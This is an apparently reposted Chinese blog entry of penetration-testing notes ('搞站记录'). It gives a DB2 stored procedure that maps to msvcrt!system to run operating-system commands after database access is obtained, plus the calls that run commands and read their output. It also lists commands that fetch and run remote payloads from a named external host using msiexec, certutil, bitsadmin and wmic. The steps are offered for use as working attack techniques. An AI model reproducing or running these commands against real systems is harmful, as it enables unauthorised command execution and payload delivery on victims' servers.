日常渗透测试搞站记录

DB2 数据库权限执行系统命令

记录一下拿到db2数据库权限之后,进行系统命令执行的过程,db2默认绑定的是50000端口:

1、创建一个临时的表

日常渗透测试搞站记录
2、创建存储过程(windows)
CREATE PROCEDURE db2_cmd_exec (IN cmd varchar(200))
EXTERNAL NAME 'c:\windows\system32\msvcrt!system'
LANGUAGE C 
DETERMINISTIC 
PARAMETER STYLE DB2SQL

3、使用创建的存储过程db2_cmd_exec执行系统命令

CALL db2_cmd_exec ('dir D:\web\ > c:\whoami.log')

4、读取命令执行结果日志文件,写入到创建好的临时表中

CALL ADMIN_CMD('IMPORT FROM c:\whoami.log OF DEL INSERT INTO 表名')

msiexec在渗透中的使用

遇到一个台dns都不能出网的windows服务器,最后使用msiexec.exe从远程下载,居然可以出网,没搞明白啥原因。

msiexec.exe /i http://www.nxadmin.com/xxx.msi

命令执行之后,会自动加载远程.msi文件,并运行,只能加载运行.msi文件

其它一些命令的使用

certutil -urlcache -split -f http://www.nxadmin.com/xxxx.txt c:\xxxx.txt

bitsadmin /rawreturn /transfer getfile http://www.nxadmin.com/xxxx.msi c:\xxxx.msi

wmic os get /FORMAT:”http://www.nxadmin.com”

用到的一些nday漏洞

Spring Boot Actuator未授权访问远程代码执行漏洞

原文地址》》

声明:本站大部分下载资源收集于网络,只做学习和交流使用,版权归原作者所有,未及时购买和付费发生的侵权行为,与本站无关。

给TA打赏
共{{data.count}}人
人已打赏
网络安全

CVE-2020-0796远程代码执行复现

2020-6-5 23:14:50

网络安全

CVE-2020-5902 BIG-IP RCE漏洞复现

2020-7-26 9:42:08

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索